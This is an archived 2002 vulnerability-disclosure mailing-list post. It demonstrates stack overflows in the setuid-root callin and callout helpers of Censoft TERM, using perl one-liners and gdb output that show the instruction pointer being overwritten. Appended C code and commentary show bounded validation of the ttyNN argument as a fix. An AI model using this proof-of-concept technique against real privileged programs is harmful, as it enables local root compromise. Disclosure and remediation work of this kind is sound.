Vulnerability Development mailing list archives

Censoft TERM Emu bOf


From: KF <dotslash () snosoft com>
Date: Fri, 22 Feb 2002 13:16:18 -0500


Vendor: www.censoft.com

Product: TERM for UNIX / Linux
Emulations Wyse 60, SCO ANSI, VT220 Terminal
Supports SCO, AIX, HP, DEC, Solaris Operating Environment[tm] software, and Linux[tm] 

I WAS going to purchase this product after trying the eval; however, I changed my mind for some reason... I would imagine the full product is also vulnerable.

[elguapo@linux elguapo]$ ftp ftp.censoft.com
Connected to ftp.censoft.com.
220 ns.centurysoftware.com FTP server (Version 6.00) ready.
Name (ftp.censoft.com:elguapo): anonymous
331 Guest login ok, send your email address as password.
Password:
230- Welcome To Century Software Ftp Server.
230-
230- Here you will find all the Century Software
230- Products.
230-
...
ftp> cd download/windows/linux
250 CWD command successful.
ftp> get termlx.tar
local: termlx.tar remote: termlx.tar
200 PORT command successful.
150 Opening BINARY mode data connection for 'termlx.tar' (931840 bytes).
226 Transfer complete.

As you can see, the .tar file has some suid root stuff to play with.
[elguapo@linux elguapo]$ tar tvf termlx.tar
-rwxr-xr-x root/root    630976 2000-04-01 02:00:00 term
-rwsr-xr-x root/root     96988 1999-03-22 23:52:10 callin
-rwsr-xr-x root/root     97144 1999-03-22 23:52:11 callout
-rwxr-xr-x root/root     94484 1999-03-22 23:52:10 brand

Apparently I don't play nice.
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin `perl -e 'print "A" x 9000'`
Arguments must be of form ttyNN
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

rm /etc/LCK..inittab if you need to try again, or you will get the following message:
Non-expired lockfile: /etc/LCK..inittab

Let's check the stack out a bit.
[root@linux /root]# gdb  /home/elguapo/Censoft/callin core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1      1
ebx            0x805fdf0        134610416
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd858       -1073751976
eip            0x42424242       0x42424242

The callout binary is also affected.
[root@linux /root]# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'`
Segmentation fault (core dumped)

[root@linux /root]# gdb  /home/elguapo/Censoft/callout core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1      1
ebx            0x805fe88        134610568
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd856       -1073751978
eip            0x42424242       0x42424242


-KF
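The crash above is the classic shape of an unbounded copy of argv[1] into a fixed stack buffer inside a setuid-root helper: the prefix check ("Arguments must be of form ttyNN") is applied, but the length of what follows "tty" is not. The following is an added example, not code from the post or from Century Software, of how a setuid program should validate such an argument before it touches any fixed-size buffer. The "ttyNN" format and the 9000-byte input come from the post; the function names, the 16-byte buffer and the four-digit limit are assumptions.

```c
/* Added example (not Century Software's code): a bounded, allow-list style
 * check for a "ttyNN" argument, the validation a setuid helper such as
 * callin/callout needs before copying argv[1] into a stack buffer.
 * Assumed: a 16-byte destination buffer and at most four digits. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define TTY_NAME_MAX   16      /* assumed size of the caller's fixed buffer */
#define TTY_PREFIX     "tty"
#define TTY_DIGITS_MAX 4       /* assumed: tty0 .. tty9999 */

/* Returns 1 and fills out (NUL-terminated) if arg has the form ttyNN,
 * 0 otherwise. The scan never reads past outsz bytes of arg, so an
 * unterminated or 9000-byte argument is rejected instead of overrunning out. */
int parse_tty_arg(const char *arg, char *out, size_t outsz)
{
    const size_t plen = strlen(TTY_PREFIX);

    if (arg == NULL || out == NULL || outsz < plen + TTY_DIGITS_MAX + 1)
        return 0;

    /* Bounded length scan: stop at outsz rather than trusting a terminator. */
    size_t n = 0;
    while (n < outsz && arg[n] != '\0')
        n++;
    if (n >= outsz)                      /* too long to ever fit, reject */
        return 0;

    if (n <= plen || n > plen + TTY_DIGITS_MAX)
        return 0;
    if (memcmp(arg, TTY_PREFIX, plen) != 0)
        return 0;
    for (size_t i = plen; i < n; i++)    /* only digits after the prefix */
        if (!isdigit((unsigned char)arg[i]))
            return 0;

    memcpy(out, arg, n + 1);             /* n < outsz, so NUL fits too */
    return 1;
}

/* Convenience wrapper: 1 if arg would be accepted into a TTY_NAME_MAX buffer. */
int tty_arg_ok(const char *arg)
{
    char name[TTY_NAME_MAX];
    return parse_tty_arg(arg, name, sizeof name);
}

/* Builds a constructed "tty" + len * 'A' argument, like the one in the post,
 * and returns 1 if the validator rejects it. */
int rejects_long_tty_arg(size_t len)
{
    char *big = malloc(len + 4);
    if (big == NULL)
        return 0;
    memcpy(big, TTY_PREFIX, 3);
    memset(big + 3, 'A', len);
    big[len + 3] = '\0';
    int rejected = (tty_arg_ok(big) == 0);
    free(big);
    return rejected;
}

int main(int argc, char **argv)
{
    char name[TTY_NAME_MAX];
    if (argc != 2 || !parse_tty_arg(argv[1], name, sizeof name)) {
        fputs("Arguments must be of form ttyNN\n", stderr);
        return 1;
    }
    printf("accepted %s\n", name);
    return 0;
}
```

The point of the bounded scan is that the length check happens before anything is copied, and it is bounded by the destination size rather than by the attacker-controlled string; a privileged program that instead does a prefix check followed by strcpy() gets exactly the eip=0x42424242 result shown in the gdb output.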